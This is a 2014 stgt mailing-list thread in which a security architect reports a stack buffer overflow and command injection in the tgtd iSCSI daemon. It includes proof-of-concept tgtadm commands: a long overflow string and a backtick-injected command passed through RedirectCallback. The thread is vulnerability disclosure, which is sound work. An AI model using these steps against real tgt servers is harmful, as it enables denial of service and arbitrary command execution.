[stgt] tgtd buffer overflow and command injection vulnerabilities

Hullinger, Jason (Cloud Services) jason.hullinger at hp.com
Fri Jun 13 21:23:35 CEST 2014


Hi,

There is no patch because I'm a bit confused as to what the proper
functionality is suppose to be. Typically a client/server model does not
allow the client to inject arbitrary commands to the server. This is
because a compromised client may further compromise the server by
injecting malicious commands. Is the intent here to allow the client
(tgtadmn) to inject arbitrary commands to the server (tgtd)? Additionally
though, when str_spacecpy is called, the dest can be smaller than the src
because the src can be 1024 bytes while the dest is set to 256 bytes
causing a stack overflow and possible code execution and/or a denial of
service.

Thanks,

Jason Hullinger

On 6/12/14, 7:27 PM, "Hitoshi Mitake" <mitake.hitoshi at gmail.com> wrote:

>At Tue, 10 Jun 2014 19:17:35 +0000,
>Hullinger, Jason (Cloud Services) wrote:
>> 
>> TGT Team:
>> 
>> The function call_program in the tgtd daemon includes a callback
>>function
>> that will run arbitrary commands. Additionally, it does not check that
>>the
>> cmd argument is smaller than the allocated buffer size causing a buffer
>> overflow. Example and proof of concept:
>> 
>> usr/tgtd.c
>> 
>> int call_program(const char *cmd, void (*callback)(void *data, int
>>result),
>> 		void *data, char *output, int op_len, int flags)
>> ...
>> char *pos, arg[256];
>> ...
>> str_spacecpy(&pos, cmd);
>> 
>> Where str_spacecpy (usr/tgtd.c) chops multiple white spaces into one
>>white
>> space. It takes a dest buffer and copies into a src buffer:
>> 
>> void str_spacecpy(char **dest, const char *src)
>> 
>> call_program is called from usr/target.c in get_redirect_address
>> 
>> static int
>> get_redirect_address(char *callback, char *buffer, int buflen,
>> 			char **address, char **ip_port, int *rsn)
>> ...
>> if (call_program(callback, NULL, NULL, buffer, buflen, 0))
>> ...
>> 
>> Where get_redirect_address is called from usr/target.c by:
>> 
>> int target_redirected(struct iscsi_target *target,
>> 	struct iscsi_connection *conn, char *buf, int *reason)
>> ...
>> char dst[INET6_ADDRSTRLEN], in_buf[1024];
>>  ...
>> 		ret = get_redirect_address(in_buf, buffer,
>> 					sizeof(buffer), &addr, &port, &rsn);
>> ...
>> 
>> in_buf, size 1024, is passed to call_program as 'cmd', which then copies
>> into the dest char buffer of size 256 causing a buffer overflow.
>> 
>> In addition to that, any arbitrary command line argument that is pass in
>> by tgtadm will be executed. Example:
>> 
>> sudo tgtd -C 1 --iscsi portal=127.0.0.1:860
>> sudo ./scripts/tgt-admin -C 1  -e -c /home/ubuntu/tgt/targets.confg
>> 
>> (in a different shell) sudo gdb --args tgtd -f -C 2 --iscsi
>> portal=127.0.0.1
>> sudo ./scripts/tgt-admin -C 2  -e -c /home/ubuntu/tgt/targets.confg
>> 
>> sudo tgtadm -C 2 --op update --mode target --tid 1 --name
>>RedirectAddress
>> --value 127.0.0.1
>> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectPort
>> --value 860
>> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectReason
>> --value Temporary
>> 
>> sudo tgtadm -C 2 --op update --mode target --tid 1 --name
>>RedirectCallback
>> --value 
>> 
>>1zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> 
>>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> 
>>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> 
>>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> 
>>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> 
>>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>>zz
>> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
>> 
>> sudo iscsiadm -m discovery -t st -p 127.0.0.1
>> sudo iscsiadm -m node -p 127.0.0.1 -l
>> 
>> Upon attempting to authenticate, the command set by the --name
>> RedirectCallback --value tgtadm directive will attempt to be executed.
>>If
>> you replace the above example with:
>> 
>> sudo tgtadm -C 2 --op update --mode target --tid 1 --name
>>RedirectCallback
>> --value "/usr/bin/logger `whoami`"
>> 
>> You will see in the syslog file, where 'ubuntu' is the current user:
>> 
>> ubuntu iqn.2014-05.local.localhost:foobar 127.0.0.1
>> 
>> I'm a bit unclear as to what exactly is suppose to happen here, or what
>> the intended result is, but it seems that arbitrary commands should not
>>be
>> allowed to be injected from tgtadm in addition to checking the strlen of
>> cmd.
>> 
>> Thanks, and let me know if I can answer or clarify any questions.
>
>I'm still not digging in the problem, but it seems to be very
>important. I added a new issue in the launchpad tracker:
>
>https://bugs.launchpad.net/tgt-project/+bug/1329586
>
>I'd like to fix it when I can allocate time for it, or have you
>already created a patch for it?
>
>Thanks,
>Hitoshi
>
>> 
>> Jason Hullinger
>> 
>> Security Architect
>> HP Helion Cloud
>> 
>> --
>> To unsubscribe from this list: send the line "unsubscribe stgt" in
>> the body of a message to majordomo at vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 5475 bytes
Desc: not available
URL: <http://lists.wpkg.org/pipermail/stgt/attachments/20140613/5f1ddedc/attachment-0003.bin>


More information about the stgt mailing list